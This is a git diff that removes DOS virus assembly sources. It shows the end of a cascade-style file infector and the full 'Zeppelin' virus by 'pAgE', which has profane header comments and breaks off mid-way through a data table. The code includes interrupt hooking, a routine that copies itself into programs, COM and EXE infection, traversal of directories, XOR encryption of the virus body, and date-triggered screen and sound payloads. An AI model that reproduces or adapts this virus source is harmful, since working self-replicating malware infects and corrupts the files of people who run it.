; Branch if yes -I_2122: MOV AX,4301H ; Set file attributes function - LDS DX,F_PATH ; Pathname pointer - INT 21H ; DOS service -I_2124: POP DS - POP ES - POP BP - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - POPF - JMP I_2102 ; Original interrupt 21H - - ; Create random number - -RNDNUM: PUSH DS - PUSH CS ; \ Set DS to CS - POP DS ; / - PUSH BX - PUSH CX - PUSH DX - PUSH AX ; Save multiplier - MOV CX,7 ; Seven words to move - MOV BX,OFFSET RANDOM+14 ; Last word of randomiser - PUSH [BX] ; Save last word -RND010: MOV AX,[BX-2] ; Get previous word - ADC [BX],AX ; Add to current word - DEC BX ; \ Address previous word - DEC BX ; / - LOOP RND010 ; Repeat for each word - POP AX ; Retrieve last word - ADC [BX],AX ; Add to first word - MOV DX,[BX] ; Get result - POP AX ; Recover multiplier - OR AX,AX ; Is there a multiplier? - JZ RND020 ; Branch if not - MUL DX ; Multiply random number -RND020: MOV AX,DX ; Move result - POP DX - POP CX - POP BX - POP DS - RET - - ; Copy system clock - -GETCLK: PUSH DS - PUSH ES - PUSH SI - PUSH DI - PUSH CX - PUSH CS ; \ Set ES to CS - POP ES ; / - MOV CX,0040H ; \ Set DS to system RAM - MOV DS,CX ; / - MOV DI,OFFSET RANDOM ; Randomizer work area - MOV SI,006CH ; Address system clock - MOV CX,8 ; Eight bytes to copy - CLD - REPZ MOVSW ; Copy system clock - POP CX - POP DI - POP SI - POP ES - POP DS - RET - - ; Get character and attributes - - ASSUME DS:CODE -GETCHA: PUSH SI - PUSH DS - PUSH DX - MOV AL,DH ; Get row number - MUL NUMCOL ; Number of visible columns - MOV DH,0 ; Clear top of register - ADD AX,DX ; Add column number - SHL AX,1 ; Multiply by two - ADD AX,VDURAM ; Add VDU display start address - MOV SI,AX ; Move character pointer - TEST C80_SW,0FFH ; Test 80 column text switch - MOV DS,RAM_SG ; Video RAM segment - JZ GTC030 ; Branch if switch off - MOV DX,03DAH ; VDU status register - CLI -GTC010: IN AL,DX ; Get VDU status - TEST AL,8 ; Is it frame flyback time - JNZ GTC030 ; Branch if yes - TEST AL,1 ; Test toggle bit - JNZ GTC010 ; Branch if on -GTC020: IN AL,DX ; Get VDU status - TEST AL,1 ; Test toggle bit - JZ GTC020 ; Branch if off -GTC030: LODSW ; Load character and attribute - STI - POP DX - POP DS - POP SI - RET - - ; Store character and attributes - -STOCHA: PUSH DI - PUSH ES - PUSH DX - PUSH BX - MOV BX,AX - MOV AL,DH ; Get row number - MUL NUMCOL ; Number of visible columns - MOV DH,0 ; Clear top of register - ADD AX,DX ; Add column number - SHL AX,1 ; Multiply by two - ADD AX,VDURAM ; Add VDU display start address - MOV DI,AX ; Move character pointer - TEST C80_SW,0FFH ; Test 80 column text switch - MOV ES,RAM_SG ; Video RAM segment - JZ STO030 ; Branch if switch off - MOV DX,03DAH ; VDU status register - CLI -STO010: IN AL,DX ; Get VDU status - TEST AL,8 ; Is it frame flyback time - JNZ STO030 ; Branch if yes - TEST AL,1 ; Test toggle bit - JNZ STO010 ; Branch if on -STO020: IN AL,DX ; Get VDU status - TEST AL,1 ; Test toggle bit - JZ STO020 ; Branch if off -STO030: MOV AX,BX - STOSB ; Store character and attribute - STI - POP BX - POP DX - POP ES - POP DI - RET - - ; Delay loop - -DELAY: PUSH CX -DEL010: PUSH CX - MOV CX,LOOPCT ; Get timed loop count -DEL020: LOOP DEL020 - POP CX - LOOP DEL010 - POP CX - RET - - ; Toggle speaker drive - -CH_SND: PUSH AX - IN AL,61H ; Get port B - XOR AL,2 ; Toggle speaker drive - AND AL,0FEH ; Switch off speaker modulate - OUT 61H,AL ; Rewrite port B - POP AX - RET - - ; Is character 0, 32 or 255? - -IGNORE: CMP AL,0 ; Is it a zero? - JE IGN010 ; Branch if yes - CMP AL,20H ; Is it a space? - JE IGN010 ; Branch if yes - CMP AL,0FFH ; Is it FF? - JE IGN010 ; Branch if yes - CLC - RET - -IGN010: STC - RET - - ; Graphic display character - -GRAPHD: CMP AL,0B0H ; Is it below 176? - JB GRA010 ; Branch if yes - CMP AL,0DFH ; Is it above 223? - JA GRA010 ; Branch if yes - STC - RET - -GRA010: CLC - RET - - ; Time one clock cycle - -TIMCYC: PUSH DS - MOV AX,0040H ; \ Set DS to system RAM - MOV DS,AX ; / - STI - ASSUME DS:RAM - MOV AX,BW046C ; Get low word of system clock -TIM010: CMP AX,BW046C ; Has clock changed? - JE TIM010 ; Branch if not - XOR CX,CX ; Clear register - MOV AX,BW046C ; Get low word of system clock -TIM020: INC CX ; Increment count - JZ TIM040 ; Branch if now zero - CMP AX,BW046C ; Has clock changed? - JE TIM020 ; Branch if not -TIM030: POP DS - ASSUME DS:NOTHING - MOV AX,CX ; Transfer count - XOR DX,DX ; Clear register - MOV CX,000FH ; \ Divide by 15 - DIV CX ; / - MOV LOOPCT,AX ; Save timed loop count - RET - -TIM040: DEC CX ; Set to minus one - JMP SHORT TIM030 - - ; Cascade display routine - - ASSUME DS:CODE -DISPLY: MOV NUMROW,18H ; Number of display rows - PUSH DS - MOV AX,0040H ; \ Set DS to system RAM - MOV DS,AX ; / - ASSUME DS:RAM - MOV AX,BW044E ; VDU display start address - POP DS - ASSUME DS:CODE - MOV VDURAM,AX ; Save VDU display start address - MOV DL,0FFH - MOV AX,1130H ; Get character generator information - MOV BH,0 ; Int 1FH vector - PUSH ES - PUSH BP - INT 10H ; VDU I/O - POP BP - POP ES - CMP DL,0FFH ; Is register unchanged? - JE DSP010 ; Branch if yes - MOV NUMROW,DL ; Number of display rows (EGA) -DSP010: MOV AH,0FH ; Get VDU parameters - INT 10H ; VDU I/O - MOV NUMCOL,AH ; Save number of columns - MOV C80_SW,0 ; Set off 80 column text switch - MOV RAM_SG,0B000H ; Video RAM segment - Mono - CMP AL,7 ; Mode 7? - JE DSP040 ; Branch if yes - JB DSP020 ; Branch if less - JMP DSP130 ; Switch off speaker and return - -DSP020: MOV RAM_SG,0B800H ; Video RAM segment - CMP AL,3 ; Display mode 3? - JA DSP040 ; Branch if above - CMP AL,2 ; Display mode 2? - JB DSP040 ; Branch if below - MOV C80_SW,1 ; Set on 80 column text switch - MOV AL,NUMROW ; Number of display rows - INC AL ; Number, not offset - MUL NUMCOL ; Number of visible columns - MOV NUMPOS,AX ; Save number of display positions - MOV AX,RANPOS ; Get number of lines to affect - CMP AX,NUMPOS ; Number of display positions - JBE DSP030 ; Branch if within range - MOV AX,NUMPOS ; Get number of display positions -DSP030: CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV SI,AX ; Use as count -DSP040: XOR DI,DI ; Set second count to zero -DSP050: INC DI ; Increment second count - MOV AX,NUMPOS ; Get number of display positions - SHL AX,1 ; Multiply by two - CMP DI,AX ; Has second count reached this? - JBE DSP060 ; Branch if not - JMP DSP130 ; Switch off speaker and return - -DSP060: OR SWITCH,2 ; Set on switch 2 - MOV AL,NUMCOL ; \ Number of visible columns - MOV AH,0 ; / is upper limit - CALL RNDNUM ; Create random number - MOV DL,AL ; Random column number - MOV AL,NUMROW ; \ Number of display rows - MOV AH,0 ; / is upper limit - CALL RNDNUM ; Create random number - MOV DH,AL ; Random row number - CALL GETCHA ; Get character and attributes - CALL IGNORE ; Is character 0, 32 or 255? - JB DSP050 ; Branch if yes - CALL GRAPHD ; Is it a graphic display character - JB DSP050 ; Branch if yes - MOV CURCHA,AL ; Save current character - MOV CURATT,AH ; Save current attributes - MOV CL,NUMROW ; Number of display rows - MOV CH,0 ; Column zero -DSP070: INC DH ; Next row - CMP DH,NUMROW ; Was that the last row? - JA DSP110 ; Branch if yes - CALL GETCHA ; Get character and attributes - CMP AH,CURATT ; Are attributes the same? - JNE DSP110 ; Branch if not - CALL IGNORE ; Is character 0, 32 or 255? - JB DSP090 ; Branch if yes -DSP080: CALL GRAPHD ; Is it a graphic display character - JB DSP110 ; Branch if yes - INC DH ; Next row - CMP DH,NUMROW ; Was that the last row? - JA DSP110 ; Branch if yes - CALL GETCHA ; Get character and attributes - CMP AH,CURATT ; Are attributes the same? - JNE DSP110 ; Branch if not - CALL IGNORE ; Is character 0, 32 or 255? - JNB DSP080 ; Branch if not - CALL CH_SND ; Toggle speaker drive - DEC DH ; Previous row - CALL GETCHA ; Get character and attributes - MOV CURCHA,AL ; Save current character - INC DH ; Next row -DSP090: AND SWITCH,0FDH ; Set off switch 2 - DEC DH ; Previous row - MOV AL,20H ; Replace character with space - CALL STOCHA ; Store character and attributes - INC DH ; Next row - MOV AL,CURCHA ; Get current character - CALL STOCHA ; Store character and attributes - JCXZ DSP100 ; Branch if end of count - CALL DELAY ; Delay loop - DEC CX ; Decrement count -DSP100: JMP SHORT DSP070 - -DSP110: TEST SWITCH,2 ; Test switch 2 - JZ DSP120 ; Branch if off - JMP DSP050 - -DSP120: CALL CH_SND ; Toggle speaker drive - DEC SI ; Subtract from count - JZ DSP130 ; Switch off speaker and return - JMP DSP040 - - ; Switch off speaker and return - -DSP130: IN AL,61H ; Get port B - AND AL,0FCH ; Switch off speaker - OUT 61H,AL ; Rewrite port B+ - RET - - ; Interrupt 1CH routine - - ASSUME DS:NOTHING -INT_1C: TEST SWITCH,9 ; No display or already active? - JNZ I_1C40 ; Branch if either are on - OR SWITCH,1 ; Set on Int 1CH active switch - DEC I1CCNT ; Subtract from Int 1CH count - JNZ I_1C30 ; Branch if not zero - PUSH DS - PUSH ES - PUSH CS ; \ Set DS to CS - POP DS ; / - PUSH CS ; \ Set ES to CS - POP ES ; / - ASSUME DS:CODE - PUSH AX - PUSH BX - PUSH CX - PUSH DX - PUSH SI - PUSH DI - PUSH BP - MOV AL,20H ; \ Signal end of interrupt - OUT 20H,AL ; / - MOV AX,I1CMAX ; Get Int 1CH random no maximum - CMP AX,0438H ; Is it 1080 or above - JNB I_1C10 ; Branch if yes - MOV AX,0438H ; Upper limit - 1080 -I_1C10: CALL RNDNUM ; Create random number - INC AX ; Add to random number - MOV I1CCNT,AX ; Reset Int 1CH count - MOV I1CMAX,AX ; Reset Int 1CH random no maximum - CALL DISPLY ; Cascade display routine - MOV AX,3 ; Upper limit - 3 - CALL RNDNUM ; Create random number - INC AX ; Add to random number - MUL RANPOS ; Multiply by num of lines to affect - JNB I_1C20 ; Is result more than a word? - MOV AX,-1 ; Set to maximum -I_1C20: MOV RANPOS,AX ; Save number of lines to affect - POP BP - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - POP ES - POP DS - ASSUME DS:NOTHING -I_1C30: AND SWITCH,0FEH ; Set off Int 1CH active switch -I_1C40: JMP I1CBIO ; Branch to original int 1CH - - ; Interrupt 28H routine - -INT_28: TEST SWITCH,8 ; Test No display switch - JZ I_2830 ; Branch if not - PUSH AX - PUSH CX - PUSH DX - MOV AH,2AH ; Get date function - INT 21H ; DOS service - CMP CX,07C4H ; Year 1988? - JB I_2820 ; Not yet - do nothing - JA I_2810 ; After 1988 - CMP DH,0AH ; October? - JB I_2820 ; Not yet - do nothing -I_2810: AND SWITCH,0F7H ; Set off No display switch -I_2820: POP DX - POP CX - POP AX -I_2830: JMP I28BIO ; Branch to original int 28H - - ; Copy virus to program - -CPYVIR: PUSH ES - PUSH BX - MOV AH,48H ; Allocate memory function - MOV BX,006BH ; Length of virus - INT 21H ; DOS service - POP BX - JNB CPY020 ; Branch if no error -CPY010: STC - POP ES - RET - -CPY020: MOV DB0100,1 ; Set encryption indicator - MOV ES,AX ; Set target segment to allocated - PUSH CS ; \ Set DS to CS - POP DS ; / - ASSUME DS:CODE - XOR DI,DI ; Start of allocated - MOV SI,OFFSET DB0100 ; Start of virus - MOV CX,VIRLEN ; Length of virus - CLD - REPZ MOVSB ; Copy virus - MOV DI,0023H ; Start of area to encrypt - MOV SI,OFFSET BP0030 ; Address of area - ADD SI,F_SIZ1 ; Length of target file - MOV CX,OFFSET ENDADR-BP0030 ; Length to encrypt -CPY030: XOR ES:[DI],SI ; \ Encrypt - XOR ES:[DI],CX ; / - INC DI ; \ Next address - INC SI ; / - LOOP CPY030 ; Repeat for all area - MOV DS,AX ; Allocated area segment - MOV AH,40H ; Write handle function - XOR DX,DX ; From start - MOV CX,VIRLEN ; Length of virus - INT 21H ; DOS service - PUSHF - PUSH AX - MOV AH,49H ; Free allocated memory function - INT 21H ; DOS service - POP AX - POPF - PUSH CS ; \ Set DS to CS - POP DS ; / - JB CPY010 ; Branch if error - CMP AX,CX ; Correct length written? - JNE CPY010 ; Branch if error - POP ES - CLC -CPY040: RET - -ENDADR EQU $ - -CODE ENDS - - END START - \ No newline at end of file diff --git a/0-9/1717 (6).ASM b/0-9/1717 (6).ASM deleted file mode 100755 index 8b8b1df..0000000 --- a/0-9/1717 (6).ASM +++ /dev/null @@ -1,664 +0,0 @@ -;************************************************************************** -; -;The Zeppelin Virus September 25, 1992 -;[MPC] Generated... -;Created by... pAgE -;As a TRiBuTe to John "back-beat" Bohnam, this "WEAK-DICK" ViRUS was made! -;Incidently. He died on this date in 1980! Got drunk and strangled on a -;CunT hAiR...oR wAs iT a tAmPoN???...Oh well, So goes RocK -n- RoLL... -;By the wAy<---That's whAt you sAy just beforE you bOrE the FuCK out of -;soMeoNe with anOthEr TRiViAl piEce of SHiT!!! These LiTTLe Up AnD LeTTeRS -;ThAt yA'll uSe, ArE a KicK.... -; -;Okay, enough anti-social, suicidal, satan, sputum...On with the ViRUS... -; GeT'S in ThE bl00d DoEsn't it?------->^^^^^ -; -;Here it is... -;It's not much, but in the hands off a knowledgeable Vx WRiTeR....... -;I'll keep workin' on it and see what I can do. In the mean time, have fun! -;I ReM'd out a lot of the ShIt iN here, So Joe LuNChmEaT doesn;t FrY hImSelF. -; -;But...If that's not good enough, well then - hEy! - BLoW mE! -; -;*************************************************************************** - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'IS' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: ; handles encryption and decryption -patch_startencrypt: - mov di,offset startencrypt ; start of decryption - mov si,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,35h ; xor word ptr cs:[di], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc di ; calculate new decryption location - inc di - dec si ; If we are not done, then - jnz decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: - pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - - cmp sp,id ; COM or EXE? - je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],5 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." - int 21h - jnc dir_scan ; go back for mo! - -done_infections: - ;mov ah,2ah ; Get current date - ;int 21h - ;cmp dh,9 ; Check month - ;jb act_two - ;cmp dl,25 ; Check date - ;jb act_two - ;cmp cx,1992 ; Check year - ;jb act_two - ;cmp al,0 ; Check date of week - ;jb activate - - ;mov ah,2ch ; Get current time - ;int 21h - ;cmp dl,50 ; Check the percentage - jbe activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? - jz returnEXE -returnCOM: - int 27h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -exe_mask db '*.exe',0 -com_mask db '*.com',0 -stacksave2 dd ? - -activate proc far - -start: - jmp short loc_1 - db 90h -data_2 db 0 -data_3 dw 216h - db 2 -data_4 dw 0 - db 'Ripped this Motherfucker off' - db 1Ah -data_5 db 'SHIT!!! Wont work....', 0Dh, 0Ah - db '$' -loc_1: - - mov ax,0003h ; stick 3 into ax. - int 10h ; Set up 80*25, text mode. Clear the screen, too. - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov bx,0B800h - cmp al,2 - je loc_2 ; Jump if equal - cmp al,3 - je loc_2 ; Jump if equal - mov data_2,0 - mov bx,0B000h - cmp al,7 - je loc_2 ; Jump if equal - mov dx,offset data_5 ; ('Unsupported Video Mode') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - retn -loc_2: - mov es,bx - mov di,data_4 - mov si,offset data_6 - mov dx,3DAh - mov bl,9 - mov cx,data_3 - cld ; Clear direction - xor ax,ax ; Zero register - -locloop_4: - lodsb ; String [si] to al - cmp al,1Bh - jne loc_5 ; Jump if not equal - xor ah,80h - jmp short loc_20 -loc_5: - cmp al,10h - jae loc_8 ; Jump if above or = - and ah,0F0h - or ah,al - jmp short loc_20 -loc_8: - cmp al,18h - je loc_11 ; Jump if equal - jnc loc_12 ; Jump if carry=0 - sub al,10h - add al,al - add al,al - add al,al - add al,al - and ah,8Fh - or ah,al - jmp short loc_20 -loc_11: - mov di,data_4 - add di,data_1e - mov data_4,di - jmp short loc_20 -loc_12: - mov bp,cx - mov cx,1 - cmp al,19h - jne loc_13 ; Jump if not equal - lodsb ; String [si] to al - mov cl,al - mov al,20h ; ' ' - dec bp - jmp short loc_14 -loc_13: - cmp al,1Ah - jne loc_15 ; Jump if not equal - lodsb ; String [si] to al - dec bp - mov cl,al - lodsb ; String [si] to al - dec bp -loc_14: - inc cx -loc_15: - cmp data_2,0 - je loc_18 ; Jump if equal - mov bh,al - -locloop_16: - in al,dx ; port 3DAh, CGA/EGA vid status - rcr al,1 ; Rotate thru carry - jc locloop_16 ; Jump if carry Set -loc_17: - in al,dx ; port 3DAh, CGA/EGA vid status - and al,bl - jnz loc_17 ; Jump if not zero - mov al,bh - stosw ; Store ax to es:[di] - loop locloop_16 ; Loop if cx > 0 - - jmp short loc_19 -loc_18: - rep stosw ; Rep when cx >0 Store ax to es:[di] -loc_19: - mov cx,bp -loc_20: - jcxz loc_new_25 ; Jump if cx=0 - loop locloop_4 ; Loop if cx > 0 -loc_new_25: - - - mov si,offset data00 ; SI points to data -get_note: mov bx,[si] ; Load BX with the frequency - or bx,bx ; Is BX equal to zero? - je play_tune_done ; If it is we are finished - - mov ax,034DDh ; - mov dx,0012h ; - cmp dx,bx ; - jnb new_note ; - div bx ; This bit here was stolen - mov bx,ax ; from the Turbo C++ v1.0 - in al,061h ; library file CS.LIB. I - test al,3 ; extracted sound() from the - jne skip_an_or ; library and linked it to - or al,3 ; an .EXE file, then diassembled - out 061h,al ; it. Basically this turns - mov al,0B6h ; on the speaker at a certain - out 043h,al ; frequency. -skip_an_or: mov al,bl ; - out 042h,al ; - mov al,bh ; - out 042h,al ; - - mov bx,[si + 2] ; BX holds duration value - xor ah,ah ; BIOS get time function - int 1Ah - add bx,dx ; Add the time to the length -wait_loop: int 1Ah ; Get the time again (AH = 0) - cmp dx,bx ; Is the delay over? - jne wait_loop ; Repeat until it is - in al,061h ; Stolen from the nosound() - and al,0FCh ; procedure in Turbo C++ v1.0. - out 061h,al ; This turns off the speaker. - -new_note: add si,4 ; SI points to next note - jmp short get_note ; Repeat with the next note -play_tune_done: -activate endp - - jmp exit_virus - -creator db '[pAgE]',0 ; YOU REALLY SHOULD TAKE THIS -virusname db '[SwanSong]',0 ; BULLSHIT OUT OF HERE!!! -author db 'pAgE',0 ; WHY NOT HOLD UP A SIGN!!! - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,20h ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+1ah] ; Filesize in DTA - cmp ax,(heap-decrypt) ; Is it too small? - jb find_next - - mov bx,word ptr [bp+buffer+1] ;get jmp location - add bx,(heap-decrypt+1) ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? - jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax,(heap-decrypt) ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - -get_encrypt_value: - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - or dx,dx ; Check if encryption value = 0 - jz get_encrypt_value ; Get another if it is - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,(heap-decrypt) ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control -data00 dw 2000,8,2500,8,2000,14,2500,14 - dw 2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 2000,8,2500,8,2000,14,2500,14 - dw 2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 2000,8,2500,8,2000,14,2500,14 - dw 2500,14,3000,4,4000,24,3500,12,4000,6 - dw 3500,12,4000,4,4500,10,5000,4 - dw 5500,15,3000,8,3500,20,3000,8,3500,50 - dw 0 - -data_6 db 9 - db 10h, 19h, 45h, 18h, 19h, 1Bh - db 01h,0D5h,0CDh,0CDh,0B8h, 04h - db 0F3h, 09h,0A9h, 04h, 9Dh - db 9 - db 0AAh, 04h,0F2h, 01h,0D5h,0CDh - db 0CDh,0B8h, 19h, 1Ch, 18h, 19h - db 12h,0D5h, 1Ah, 0Ah,0CDh,0BEh - db 20h, 09h, 5Ch, 04h,0F6h, 09h - db 2Fh, 20h, 01h,0D4h, 1Ah, 0Ah - db 0CDh,0B8h, 19h, 13h, 18h, 19h - db 03h,0C9h, 1Ah, 0Dh,0CDh,0BEh - db 19h, 03h, 0Fh,0D2h,0B7h, 19h - db 04h,0D6h, 1Ah, 03h,0C4h,0B7h - db 20h,0D2h,0D2h,0C4h,0C4h,0C4h - db 0B7h, 19h, 04h, 01h,0D4h, 1Ah - db 0Eh,0CDh,0BBh, 19h, 03h, 18h - db 19h, 03h,0BAh, 19h, 12h, 07h - db 0BAh,0BAh, 19h, 04h,0BAh, 19h - db 03h,0BDh, 20h,0BAh,0BAh, 19h - db 02h,0D3h,0B7h, 19h, 13h, 01h - db 0BAh, 19h, 03h, 18h, 19h, 03h - db 0BAh, 19h, 07h, 0Bh, 1Ah, 02h - db 04h, 19h, 07h, 08h,0BAh,0B6h - db 19h, 04h,0C7h,0C4h,0B6h, 19h - db 03h,0BAh,0B6h, 19h, 03h,0BAh - db 19h, 07h, 0Bh, 1Ah, 02h, 04h - db 19h, 08h, 01h,0BAh, 19h, 03h - db 18h,0D6h,0C4h,0C4h, 20h,0BAh - db 19h, 12h, 08h,0BAh,0D3h, 19h - db 02h,0B7h, 20h,0BAh, 19h, 03h - db 0B7h, 20h,0BAh,0D3h, 19h, 02h - db 0D6h,0BDh, 19h, 13h, 01h,0BAh - db 20h,0C4h,0C4h,0B7h, 18h,0D3h - db 0C4h,0C4h,0C4h,0BDh, 19h, 12h - db 08h,0D3h, 1Ah, 03h,0C4h,0BDh - db 20h,0D3h, 1Ah, 03h,0C4h,0BDh - db 20h,0D0h, 1Ah, 03h,0C4h,0BDh - db 19h, 14h, 01h,0D3h,0C4h,0C4h - db 0C4h,0BDh, 18h, 04h, 1Ah, 04h - db 3Eh, 19h, 03h, 0Fh,0D6h, 1Ah - db 04h,0C4h,0B7h, 20h,0D6h, 1Ah - db 03h,0C4h,0B7h, 20h,0D2h,0D2h - db 0C4h,0C4h,0C4h,0B7h, 20h,0D2h - db 0D2h,0C4h,0C4h,0C4h,0B7h, 20h - db 0D6h, 1Ah, 03h,0C4h,0B7h, 20h - db 0D2h,0B7h, 19h, 04h,0D2h, 20h - db 20h,0D2h,0D2h,0C4h,0C4h,0C4h - db 0B7h, 19h, 03h, 04h, 1Ah, 04h - db 3Ch, 18h, 01h,0D6h,0C4h,0C4h - db 0C4h,0B7h, 19h, 07h, 07h,0D6h - db 0C4h,0BDh - dd 319BA20h ; Data table (indexed access) - db 0BDh, 20h,0BAh,0BDh, 19h, 02h - db 0BAh, 20h,0BAh,0BDh, 19h, 02h - db 0BAh, 20h,0BAh, 19h, 03h,0BDh - db 20h,0BAh,0BAh, 19h, 04h,0BAh - db 20h, 20h,0BAh,0BAh, 19h, 02h - db 0BAh, 19h, 03h, 01h,0D6h,0C4h - db 0C4h,0C4h,0B7h, 18h,0D3h,0C4h - db 0C4h, 20h,0BAh, 19h, 06h, 08h - db 58h, 19h, 03h,0C7h,0C4h,0B6h - db 19h, 03h,0BAh, 1Ah, 03h,0C4h - db 0BDh, 20h,0BAh, 1Ah, 03h,0C4h - db 0BDh, 20h,0C7h,0C4h,0B6h, 19h - db 03h,0BAh,0B6h, 19h, 04h,0BAh - db 20h, 20h,0BAh,0B6h, 19h, 02h - db 0BAh, 19h, 03h, 01h,0BAh, 20h - db 